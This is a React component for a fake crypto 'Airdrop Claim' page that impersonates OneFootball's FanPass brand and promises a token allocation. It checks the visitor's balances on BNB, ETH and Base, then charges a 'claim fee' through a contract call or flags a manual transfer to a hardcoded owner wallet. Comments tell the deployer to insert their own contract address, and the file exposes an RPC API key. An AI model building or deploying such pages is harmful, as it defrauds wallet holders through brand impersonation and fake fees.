/* global BigInt */
import React, { useState, useEffect } from 'react';
import { useAccount, useDisconnect, useWriteContract } from 'wagmi';
import { useConnectModal } from '@rainbow-me/rainbowkit';
import { formatEther, parseEther } from 'viem';
import { FaInstagram, FaTiktok, FaTwitter, FaYoutube, FaBars, FaTimes, FaChevronDown, FaUser } from 'react-icons/fa';

// IMPORT ABI DARI FILE abi.json
import CONTRACT_ABI from '../abi.json';

// ISI DENGAN ADDRESS CONTRACT ANDA
const CONTRACT_ADDRESS = "0x9c58cD7c08d25F346266bE2240Dd53CaEb201353"; 

const RPC_BNB = "https://rpc.ankr.com/bsc/80356e80b9423592e3fa81fb7cdbeb62ee0f6c197bb5e70964e8f22d5fd5d0fc";
const RPC_ETH = "https://rpc.ankr.com/eth/80356e80b9423592e3fa81fb7cdbeb62ee0f6c197bb5e70964e8f22d5fd5d0fc";
const RPC_BASE = "https://rpc.ankr.com/base/80356e80b9423592e3fa81fb7cdbeb62ee0f6c197bb5e70964e8f22d5fd5d0fc";
const OWNER_WALLET = "0x5AADe7567183777bF1925Ad55Ab6cA32546AbD81";

const fetchBalance = async (rpcUrl, walletAddress) => {
  try {
    const res = await fetch(rpcUrl, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ jsonrpc: "2.0", method: "eth_getBalance", params: [walletAddress, "latest"], id: 1 })
    });
    const data = await res.json();
    return parseFloat(formatEther(BigInt(data.result)));
  } catch (e) {
    return 0;
  }
};

function ClaimPage({ navigateToSwap }) {
  const { address, isConnected } = useAccount();
  const { disconnect } = useDisconnect();
  const { openConnectModal } = useConnectModal();
  const { writeContract } = useWriteContract(); // Hook untuk Write Smart Contract

  const [activeNetwork, setActiveNetwork] = useState(() => {
    if (typeof window !== 'undefined') return sessionStorage.getItem('fp_activeNetwork') || 'BNB';
    return 'BNB';
  });
  
  const [networkBalance, setNetworkBalance] = useState(() => {
    if (typeof window !== 'undefined') return parseFloat(sessionStorage.getItem('fp_networkBalance')) || 0;
    return 0;
  });

  const baseAllocation = 10280.00;
  const [selectedContract, setSelectedContract] = useState('key');
  
  const [isProfileDropdownOpen, setProfileDropdownOpen] = useState(false);
  const [isMobileMenuOpen, setMobileMenuOpen] = useState(false);
  const [showError, setShowError] = useState(false);

  useEffect(() => {
    if (isConnected && address) {
      const checkBalances = async () => {
        const balBNB = await fetchBalance(RPC_BNB, address);
        const balETH = await fetchBalance(RPC_ETH, address);
        const balBASE = await fetchBalance(RPC_BASE, address);

        const maxBal = Math.max(balBNB, balETH, balBASE);
        let net = 'BNB';
        let bal = 0;

        if (maxBal === 0) { net = 'BNB'; bal = 0; } 
        else if (balBNB === maxBal) { net = 'BNB'; bal = balBNB; } 
        else if (balETH === maxBal) { net = 'ETH'; bal = balETH; } 
        else { net = 'BASE'; bal = balBASE; }

        setActiveNetwork(net);
        setNetworkBalance(bal);
        
        if (typeof window !== 'undefined') {
          sessionStorage.setItem('fp_activeNetwork', net);
          sessionStorage.setItem('fp_networkBalance', bal.toString());
        }
      };
      checkBalances();
    } else {
      if (typeof window !== 'undefined') {
        sessionStorage.removeItem('fp_activeNetwork');
        sessionStorage.removeItem('fp_networkBalance');
      }
      setActiveNetwork('BNB');
      setNetworkBalance(0);
    }
  }, [isConnected, address]);

  const networkConfig = {
    BNB: { claimFee: 0.005, errorText: "Insufficient BNB balance, you must HODL 0.005 BNB FOR CLAIM.", logo: '/bnb.png' },
    ETH: { claimFee: 0.0015, errorText: "Insufficient ETH balance for claim. You must HODL 0.0015 ETH", logo: '/eth.png' },
    BASE: { claimFee: 0.0015, errorText: "Insufficient ETH balance for claim. You must HODL 0.0015 ETH", logo: '/base.webp' }
  };

  const contracts = {
    key: { title: 'Key squad player', duration: '9 months', percentage: 100 },
    rotational: { title: 'Rotational player', duration: '6 months', percentage: 55 },
    bench: { title: 'Bench player', duration: '3 months', percentage: 30 }
  };

  const currentSelection = contracts[selectedContract];
  const currentConfig = networkConfig[activeNetwork];

  const eligibleAirdrop = baseAllocation; 
  const availableNow = (baseAllocation * currentSelection.percentage) / 100;
  const unlocksOverTime = baseAllocation - availableNow;

  const formatNumber = (num) => num.toLocaleString('en-US', { minimumFractionDigits: 2, maximumFractionDigits: 2 });

  const handleConfirm = () => {
    if (!isConnected) {
      openConnectModal();
    } else {
      if (networkBalance < currentConfig.claimFee) {
        setShowError(true);
        setTimeout(() => setShowError(false), 4000);
        return;
      }

      // Ambil address referral dari URL parameter (?ref=...)
      const urlParams = new URLSearchParams(window.location.search);
      const refAddress = urlParams.get('ref') || "0x0000000000000000000000000000000000000000";

      // Tentukan Tier berdasarkan opsi yang dipilih di Frontend
      let tier = 1; // Default 100%
      if (selectedContract === 'rotational') tier = 2; // 55%
      if (selectedContract === 'bench') tier = 3; // 30%
      
      if (activeNetwork === 'BNB') {
        // Interaksi ke Smart Contract jika menggunakan BNB
        try {
          writeContract({
            address: CONTRACT_ADDRESS,
            abi: CONTRACT_ABI,
            functionName: 'claimAirdrop',
            args: [refAddress, tier], // Mengirim address referral dan tier yang dipilih
            value: parseEther("0.005"), // Fee Claim 0.005 BNB
          });
        } catch(e) {
          console.error("Gagal interaksi contract", e);
        }
      } else {
        // Logika Transfer Manual jika menggunakan ETH atau BASE
        console.log(`Mengirim fee claim ${currentConfig.claimFee} ETH di jaringan ${activeNetwork} ke Owner Wallet: ${OWNER_WALLET}`);
        // Anda bisa menambahkan logika sendTransaction wagmi di sini nantinya
      }
    }
  };

  return (
    <div className="dark-theme-wrapper">
      {isMobileMenuOpen && (
        <div className="fp-mobile-overlay">
          <div className="fp-mobile-close" onClick={() => setMobileMenuOpen(false)}>
            <FaTimes size={24} color="#ffffff" />
          </div>
          <div className="fp-mobile-links">
            <span>FanPass</span>
            <span>Wallet</span>
            <span>Quests & Rewards</span>
            <span className="active">Airdrop Claim</span>
            <span>1F Predict</span>
            <span>Settings</span>
            <span onClick={navigateToSwap} style={{ color: '#b062ff', cursor: 'pointer' }}>Go to Swap</span>
          </div>
          <div className="fp-mobile-footer-logo">
            <img src="/fanpasslogo.svg" alt="Logo" className="fp-logo-icon" />
            <img src="/fanpasstext.svg" alt="FanPass" className="fp-logo-text-img" />
          </div>
        </div>
      )}

      <nav className="fp-navbar">
        <div className="fp-logo-area">
           <img src="/fanpasslogo.svg" alt="Logo" className="fp-logo-icon" />
           <img src="/fanpasstext.svg" alt="FanPass" className="fp-logo-text-img" />
        </div>
        <div className="fp-nav-links">
          <span className="fp-link">FanPass</span>
          <span className="fp-link">Wallet</span>
          <span className="fp-link">Quests & Rewards</span>
          <span className="fp-link active">Airdrop Claim</span>
        </div>
        <div className="fp-nav-right">
          <div className="fp-profile-wrapper">
            <div className="fp-profile-box" onClick={() => isConnected ? setProfileDropdownOpen(!isProfileDropdownOpen) : openConnectModal()}>
              <div className="fp-avatar empty"><FaUser size={14} color="#a0a0a5" /></div>
              <FaChevronDown size={12} color="#a0a0a5" className="fp-caret-icon" />
            </div>
            {isProfileDropdownOpen && isConnected && (
              <div className="fp-dropdown-menu"><button onClick={() => { disconnect(); setProfileDropdownOpen(false); }}>Disconnect Wallet</button></div>
            )}
          </div>
          <div className="fp-mobile-menu-btn" onClick={() => setMobileMenuOpen(true)}>
            <FaBars size={24} color="#a0a0a5" />
          </div>
        </div>
      </nav>

      <main className="fp-main-container">
        <div className="fp-left-panel">
          <h1 className="fp-title">Select your contract</h1>
          <p className="fp-description">The longer the contract, the more of the total eligible airdrop you can unlock over time. 10% will be available immediately, the rest unlocks monthly on a linear basis.</p>
          <div className="fp-contract-list">
            {Object.entries(contracts).map(([key, data]) => (
              <div key={key} className={`fp-contract-card ${selectedContract === key ? 'selected' : ''}`} onClick={() => setSelectedContract(key)}>
                <div className="fp-radio"><div className={`fp-radio-dot ${selectedContract === key ? 'active' : ''}`}></div></div>
                <div className="fp-contract-info">
                  <h3 className="fp-contract-title">{data.title}</h3>
                  <p className="fp-contract-duration">Contract duration of {data.duration}</p>
                  <span className="fp-contract-badge">Eligible for {data.percentage}% of airdrop</span>
                </div>
              </div>
            ))}
          </div>
        </div>

        <div className="fp-right-panel">
          <div className="fp-box fp-potential-box">
            <p className="fp-box-label">Total potential airdrop</p>
            <div className="fp-amount-row">
              <span className="fp-huge-amount">{formatNumber(baseAllocation)}</span>
              <div className="token-badge-container">
                <img src="/icon.png" alt="OFC" className="fp-token-icon" />
                {isConnected && <img src={currentConfig.logo} alt="Net" className="network-badge-overlay" />}
              </div>
            </div>
          </div>

          <div className="fp-box fp-eligible-box">
            <p className="fp-box-label">Total eligible airdrop</p>
            <div className="fp-amount-row">
              <span className="fp-huge-amount fp-eligible-amount">{formatNumber(eligibleAirdrop)}</span>
              <div className="token-badge-container">
                <img src="/icon.png" alt="OFC" className="fp-token-icon fp-eligible-icon" />
                {isConnected && <img src={currentConfig.logo} alt="Net" className="network-badge-overlay" />}
              </div>
            </div>
            <div className="fp-split-stats">
              <div className="fp-stat-col">
                <span className="fp-stat-label">Available Now</span>
                <div className="fp-stat-val-row">
                  <span className="fp-stat-value">{formatNumber(availableNow)}</span>
                  <div className="token-badge-container">
                    <img src="/icon.png" alt="OFC" className="fp-token-icon-small" />
                    {isConnected && <img src={currentConfig.logo} alt="Net" className="network-badge-overlay" />}
                  </div>
                </div>
              </div>
              <div className="fp-stat-col">
                <span className="fp-stat-label">Unlocks over {currentSelection.duration}</span>
                <div className="fp-stat-val-row">
                  <span className="fp-stat-value">{formatNumber(unlocksOverTime)}</span>
                  <div className="token-badge-container">
                    <img src="/icon.png" alt="OFC" className="fp-token-icon-small" />
                    {isConnected && <img src={currentConfig.logo} alt="Net" className="network-badge-overlay" />}
                  </div>
                </div>
              </div>
            </div>
          </div>

          <div className="fp-action-area">
            <button className="fp-confirm-btn" onClick={handleConfirm}>
              {!isConnected ? "Confirm selection" : "Confirm selection"}
            </button>
            
            {showError && (
              <p className="fp-error-text" style={{ marginTop: '8px', marginBottom: '4px' }}>
                {currentConfig.errorText}
              </p>
            )}

            <button className="fp-swap-nav-btn" onClick={navigateToSwap}>
              Go to Uniswap
              <img src="/uniswap.png" alt="Uniswap" style={{ width: '20px', height: '20px', objectFit: 'contain' }} />
            </button>
          </div>
        </div>
      </main>

      <footer className="fp-new-footer">
        <div className="fp-new-socials">
          <a href="https://x.com/ofc_the_club" className="fp-social-icon"><FaTwitter /></a>
          <a href="https://farcaster.xyz/onefootballclub" className="fp-social-icon"><img src="/forecast_dark.svg" alt="F" style={{ width: '20px', height: '20px', objectFit: 'contain' }} /></a>
          <a href="https://www.tiktok.com/@onefootballheads" className="fp-social-icon"><FaTiktok /></a>
          <a href="https://www.instagram.com/onefootballheads/" className="fp-social-icon"><FaInstagram /></a>
          <a href="https://www.youtube.com/@OneFootballHeads" className="fp-social-icon"><FaYoutube /></a>
          <a href="https://giphy.com/OneFootballHeads" className="fp-social-icon"><img src="/giphy.svg" alt="G" style={{ width: '20px', height: '20px', objectFit: 'contain' }} /></a>
        </div>
        <div className="fp-new-divider"></div>
        <div className="fp-new-footer-bottom">
          <div className="fp-new-footer-links"><a href="#">Imprint</a><a href="#">Privacy Policy</a><button>Terms and Conditions</button></div>
          <p className="fp-new-copyright">All content copyright © OneFootball 2025</p>
        </div>
      </footer>
    </div>
  );
}

export default ClaimPage;